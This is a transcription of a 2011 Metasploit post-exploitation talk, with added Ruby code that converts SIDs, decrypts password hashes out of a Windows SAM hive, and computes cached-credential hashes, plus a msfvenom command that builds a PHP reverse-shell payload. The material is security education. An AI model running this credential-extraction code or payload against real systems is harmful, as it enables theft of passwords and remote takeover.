Deep Dive Into Red Teaming With the Metasploit Framework
8/7/2019 Deep Dive Into Red Teaming With the Metasploit Framework 1/28

Deep Dive into Red Teaming with the Metasploit Framework
James "egyp7" Lee, March 22, 2011

Outline
Metasploit Framework architecture
What are Metasploit modules?
Post-exploitation modules
Building other types of payloads
Platform-agnostic payloads
New Metasploit Express/Pro features
Live Demo
This presentation is for advanced Metasploit Framework users!

Metasploit overview
Metasploit Project founded in 2003
Open Source penetration testing platform with over 1 million downloads in the past year
Acquired by Rapid7 in 2009
HD Moore joined Rapid7 as Chief Security Officer and Chief Architect of Metasploit
Rapid7 remains committed to the Community
Metasploit Framework is the foundation for the commercial editions Metasploit Express and Metasploit Pro

Metasploit Framework architecture
LIBRARIES: Rex, MSF Core, MSF Base
MODULES: Exploit, Payload, Encoder, NOP, Auxiliary
INTERFACES: Console, CLI, RPC, GUI & Armitage
PLUGINS
TOOLS

What are Metasploit modules?
More than just exploits
Payloads: the arbitrary code you hear about in advisories
Encoders: add entropy to payloads, remove bad characters
NOP: create sophisticated nopsleds
Auxiliary: like an exploit module but without a payload. Underappreciated

Metasploit Framework architecture, revisited
MODULES: Exploit, Payload, Encoder, NOP, Auxiliary, and now Post

Back in the day
Best post-exploitation option was irb. Still staggeringly useful but hard to automate
Enter: Meterpreter scripts

Meterpreter scripts
Good:
Re-read before every run, easier development
Simple interface, anything Ruby can do
Access to the framework and the session
Not so good:
No structure
No metadata
No generic compatibility checks
Ad-hoc options
Only work on Meterpreter
Not easy to reuse code

New hotness: post-exploitation modules
Newest and least-explored module type. Great place to start contributing to the framework
Intended to replace Meterpreter scripts: should retain the good aspects and improve the not-so-good aspects

Keeping the good
Always reloaded when run from meterpreter>; can use the reload and rerun commands in msf>
Simple interface
Anything Ruby can do
Access to the Framework and the session, actually easier than with scripts

Improving the not-so-good
Structured like other module types, which improves consistency and brings metadata like author, description, etc.
Option setting consistent with other modules: set VAR value
Mixins for some common tasks, more on the way: file system manipulation, registry twiddling, running commands

Using post-exploitation modules
Like exploits, can be Active or Passive
Like aux, add the run command; exploit is an alias
Take a SESSION option
Define what kinds of sessions are compatible: Meterpreter, shell, different platforms

Three ways to run them
Directly from meterpreter> with the run command:
  run post/windows/gather/resolve_sid SID=S-1-5-1
Via the normal module interface:
  use post/windows/gather/resolve_sid
  set SID S-1-5-1
  run
As an AutoRunScript:
  use exploit/some/module
  set AutoRunScript post/windows/gather/resolve_sid SID=S-1-5-1
  exploit

Railgun
Not new exactly, but undergoing some major improvements
Arbitrary Ruby -> remote Windows API bridge
Call any function in any DLL on the system
Use an application's own API against it: Chrome/Firefox stored passwords
Many potential uses here
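
The deck's running example is post/windows/gather/resolve_sid with SID=S-1-5-1, and a Railgun call such as advapi32's LookupAccountSid wants that SID as a binary structure, not as text. The following is an added example, not code from the deck, from the resolve_sid module or from Metasploit's Rex library: it converts between the textual and binary SID forms, with the length checks a module should apply to a buffer that came back from a remote API call. The domain SID used in the demo is constructed.

```ruby
# Textual SID ("S-1-5-21-...-500") to the binary SID structure that Windows
# APIs such as LookupAccountSid take: revision (1 byte), sub-authority count
# (1 byte), 48-bit identifier authority (big-endian), then each sub-authority
# as a 32-bit little-endian integer.
def sid_to_bin(sid)
  parts = sid.split('-')
  raise ArgumentError, "not a SID: #{sid}" unless parts.shift.to_s.upcase == 'S' && parts.size >= 2
  revision, authority, *subs = parts.map { |p| Integer(p, 10) }
  raise ArgumentError, 'too many sub-authorities' if subs.size > 15
  [revision, subs.size].pack('CC') +
    [authority >> 32, authority & 0xFFFFFFFF].pack('nN') +
    subs.pack('V*')
end

# The reverse direction, with the checks a module has to do before it trusts
# a buffer handed back from a remote API call.
def bin_to_sid(buf)
  raise ArgumentError, 'truncated SID' if buf.bytesize < 8
  revision, count = buf.unpack('CC')
  raise ArgumentError, 'truncated SID' if buf.bytesize < 8 + 4 * count
  hi, lo = buf[2, 6].unpack('nN')
  subs = buf[8, 4 * count].unpack('V*')
  (['S', revision, (hi << 32) | lo] + subs).join('-')
end

# The RID is the last sub-authority; 500 is the built-in Administrator.
def rid_of(sid)
  Integer(sid.split('-').last, 10)
end

if __FILE__ == $0
  # The domain SID below is constructed; S-1-5-1 is the deck's own example.
  ['S-1-5-1', 'S-1-5-32-544', 'S-1-5-21-3623811015-3361044348-30300820-500'].each do |s|
    bin = sid_to_bin(s)
    puts "#{s} -> #{bin.unpack1('H*')} -> #{bin_to_sid(bin)} (RID #{rid_of(s)})"
  end
end
```

The identifier authority is the one field that is big-endian; everything after it is little-endian, which is the usual mistake when hand-building the buffer for a Railgun call.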

Loot
Pilfered data. Can be anything, stored in a file: process listing, environment variables
Usually not passwords (use the Creds table for that)

Awesome Post Modules
Hashdump: similar in function to the hashdump command
Instead of injecting into lsass, just reads the registry. Calculates everything necessary to pull hashes directly out of the SAM
There's an OS X version now! Reads /var/db/shadow/hash/ and grabs SHA1, NT, and LM hashes
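
What "calculates everything necessary" means in practice: the registry-only path never touches lsass, so the module has to rebuild the key chain itself from data it reads out of the SYSTEM and SAM hives. The block below is an added example written for this page; it is not the deck's code or Metasploit's hashdump module. It implements the derivation for the pre-Windows 10 SAM format (RC4 for the hashed bootkey and the per-user key, DES keyed from the RID for the final step; Windows 10 1607 and later switched to AES, which is not covered). The LSA class-name strings, the value F blob and the encrypted hash in the demo are constructed stand-ins, not data from a real host; on a real host the inputs are the class names of HKLM\SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data}, value F of SAM\SAM\Domains\Account, and the V value of each SAM\SAM\Domains\Account\Users\<RID> key.

```ruby
require 'digest'
require 'openssl'

# Byte permutation applied to the 16 bytes assembled from the class names of
# HKLM\SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data} (in that order).
BOOTKEY_PERMUTATION = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
                       0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7].freeze
# Fixed strings mixed into the hashed-bootkey derivation.
SAM_QWERTY  = '!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%' + "\0"
SAM_NUMERIC = '0123456789012345678901234567890123456789' + "\0"

# Pure-Ruby RC4 so the example does not depend on OpenSSL's legacy provider.
def rc4(key, data)
  s = (0..255).to_a
  k = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.size]) & 0xFF
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  data.bytes.map do |byte|
    i = (i + 1) & 0xFF
    j = (j + s[i]) & 0xFF
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xFF]
  end.pack('C*')
end

# Step 1: each class name is a hex string; decode, concatenate, permute.
def bootkey(jd, skew1, gbg, data)
  raw = [jd + skew1 + gbg + data].pack('H*')
  BOOTKEY_PERMUTATION.map { |i| raw.getbyte(i) }.pack('C*')
end

# Step 2: the hashed bootkey, derived from value F of SAM\SAM\Domains\Account.
def hashed_bootkey(sam_f, bootkey)
  rc4_key = Digest::MD5.digest(sam_f[0x70, 16] + SAM_QWERTY + bootkey + SAM_NUMERIC)
  rc4(rc4_key, sam_f[0x80, 32])
end

# Step 3: spread 7 bytes over 8 DES key bytes, then set odd parity on each.
def str_to_des_key(s)
  k = [s[0] >> 1,
       ((s[0] & 0x01) << 6) | (s[1] >> 2),
       ((s[1] & 0x03) << 5) | (s[2] >> 3),
       ((s[2] & 0x07) << 4) | (s[3] >> 4),
       ((s[3] & 0x0f) << 3) | (s[4] >> 5),
       ((s[4] & 0x1f) << 2) | (s[5] >> 6),
       ((s[5] & 0x3f) << 1) | (s[6] >> 7),
       s[6] & 0x7f]
  k.map { |b| b <<= 1; b.to_s(2).count('1').odd? ? b : b | 1 }
end

# Both DES keys come from the user's RID alone (little-endian byte order).
def rid_to_des_keys(rid)
  r = [rid].pack('V').bytes
  [str_to_des_key([r[0], r[1], r[2], r[3], r[0], r[1], r[2]]),
   str_to_des_key([r[3], r[0], r[1], r[2], r[3], r[0], r[1]])]
end

def des_ecb_decrypt(key, block)
  c = OpenSSL::Cipher.new('des-ecb')
  c.decrypt
  c.padding = 0
  c.key = key.pack('C*')
  c.update(block) + c.final
end

# Step 4: per user. enc is the 16-byte encrypted hash taken from the user's
# V value; kind is 'NT' or 'LM'.
def decrypt_user_hash(hbootkey, rid, enc, kind = 'NT')
  rc4_key = Digest::MD5.digest(hbootkey[0, 16] + [rid].pack('V') + "#{kind}PASSWORD\0")
  obf = rc4(rc4_key, enc)
  k1, k2 = rid_to_des_keys(rid)
  des_ecb_decrypt(k1, obf[0, 8]) + des_ecb_decrypt(k2, obf[8, 8])
end

if __FILE__ == $0
  # Constructed inputs, not from a real machine: four 8-hex-digit class names
  # and a 0xA0-byte stand-in for value F. Real data comes from the registry.
  bk = bootkey('00112233', '44556677', '8899aabb', 'ccddeeff')
  sam_f = (0...0xA0).to_a.pack('C*')
  hbk = hashed_bootkey(sam_f, bk)
  puts "bootkey   #{bk.unpack1('H*')}"
  puts "hbootkey  #{hbk.unpack1('H*')}"
  puts "RID 500 DES keys #{rid_to_des_keys(500).map { |k| k.pack('C*').unpack1('H*') }.join(' ')}"
  begin
    puts "NT hash   #{decrypt_user_hash(hbk, 500, [0].pack('C') * 16).unpack1('H*')}"
  rescue StandardError => e
    puts "DES step skipped: #{e.message} (single DES is in OpenSSL 3's legacy provider)"
  end
end
```

RC4 is written out rather than taken from OpenSSL because OpenSSL 3 moved RC4 and single DES into its legacy provider; the demo guards the DES step for the same reason. The RID-derived DES keys are why a registry-only hashdump needs nothing beyond the RID and the two hive values.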

Third-party post-exploitation modules
Cachedump from Maurizio Agazzini: like hashdump, but grabs cached credentials
mscash format for easy cracking (can't be used with pass-the-hash)
Gets credentials from terminal services/RDP users
Will eventually be merged into trunk, but serves as an example of adding your own stuff
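
Why cached credentials come out in "mscash format" and cannot be passed: the cached verifier is not the NT hash but a second hash of it, salted with the lower-cased username, so the only use for it is cracking. The block below is an added example for this page, not the deck's code or the cachedump module's; MD4 is written out in pure Ruby because OpenSSL 3 keeps MD4 in its legacy provider. It goes one step beyond the slide by also showing the DCC2 form (Vista and later), which wraps the same value in PBKDF2-HMAC-SHA1 with 10240 iterations and is correspondingly slower to crack. The account in the demo is constructed.

```ruby
require 'openssl'

MASK32 = 0xFFFFFFFF

# Pure-Ruby MD4 (RFC 1320), so the example runs where OpenSSL has MD4 disabled.
def md4(msg)
  f = ->(x, y, z) { (x & y) | (~x & z) }
  g = ->(x, y, z) { (x & y) | (x & z) | (y & z) }
  h = ->(x, y, z) { x ^ y ^ z }
  rotl = ->(x, s) { x &= MASK32; ((x << s) | (x >> (32 - s))) & MASK32 }
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  bits = msg.bytesize * 8
  buf = msg.b + [0x80].pack('C')
  buf << [0].pack('C') while buf.bytesize % 64 != 56
  buf << [bits & MASK32, bits >> 32].pack('V2')
  buf.unpack('V*').each_slice(16) do |x|
    aa, bb, cc, dd = a, b, c, d
    round = lambda do |fn, k, order, sh|
      order.each_slice(4) do |i0, i1, i2, i3|
        a = rotl.(a + fn.(b, c, d) + x[i0] + k, sh[0])
        d = rotl.(d + fn.(a, b, c) + x[i1] + k, sh[1])
        c = rotl.(c + fn.(d, a, b) + x[i2] + k, sh[2])
        b = rotl.(b + fn.(c, d, a) + x[i3] + k, sh[3])
      end
    end
    round.(f, 0, (0..15).to_a, [3, 7, 11, 19])
    round.(g, 0x5a827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13])
    round.(h, 0x6ed9eba1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15])
    a, b, c, d = [a + aa, b + bb, c + cc, d + dd].map { |v| v & MASK32 }
  end
  [a, b, c, d].pack('V4')
end

# NT hash: MD4 over the UTF-16LE password. This is the value pass-the-hash reuses.
def nt_hash(password)
  md4(password.encode('UTF-16LE'))
end

# DCC1 ("mscash", XP/2003): MD4(NT hash || UTF-16LE(lowercase username)).
# The username acts as a salt, so the result is not the NT hash and cannot be
# replayed in an NTLM authentication; it has to be cracked.
def mscash1(username, password)
  md4(nt_hash(password) + username.downcase.encode('UTF-16LE').b)
end

# DCC2 ("mscash2", Vista and later): PBKDF2-HMAC-SHA1 over DCC1, salted with
# the lowercase UTF-16LE username, 10240 iterations, 16 bytes out.
def mscash2(username, password, iterations = 10240)
  salt = username.downcase.encode('UTF-16LE').b
  OpenSSL::PKCS5.pbkdf2_hmac(mscash1(username, password), salt, iterations, 16, 'sha1')
end

if __FILE__ == $0
  # Constructed sample account, not taken from any real cachedump output.
  user, pw = 'Administrator', 'Password1'
  puts "NT hash  #{nt_hash(pw).unpack1('H*')}"
  puts "mscash   #{user.downcase}:#{mscash1(user, pw).unpack1('H*')}"
  puts "mscash2  #{user.downcase}:#{mscash2(user, pw).unpack1('H*')}"
end
```

Because the username is folded to lower case before it is mixed in, two accounts with the same password still get different cached hashes, and the same account's cached hash is stable across case variations of the logon name; a cracker needs the username alongside the hash, which is what the mscash output format carries.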

Modules in the works
Something for going from shell -> Meterpreter, and from Java/PHP -> native Meterpreter
Local exploits! Already have modules for four Windows privilege escalations, and a generic service auditor
Also planning to implement Linux local exploits for shell sessions
Porting scripts to the module format

Where to put it
Official modules live in msf3/modules/, with subdirectories organized by module type (exploits/, auxiliary/, post/, ...)
~/.msf3/modules/ has the same structure and is loaded at startup if it exists (later framework versions use ~/.msf4/modules/ for the same purpose)

Platform-agnostic payloads

PHP
msfpayload php/meterpreter_reverse_tcp LHOST=192.168.99.1 R > foo.php
(msfpayload has since been retired; the same thing with its replacement is msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.99.1 -f raw > foo.php)

Commercial Feature Highlights
Pro console! All of the above and more is easily accessible in the Metasploit Pro Console

Commercial Feature Highlights
Post-exploitation modules in Metasploit Pro/Express

Commercial Feature Highlights
Host tags are Awesome

Questions?
@egyp7
James "egyp7" Lee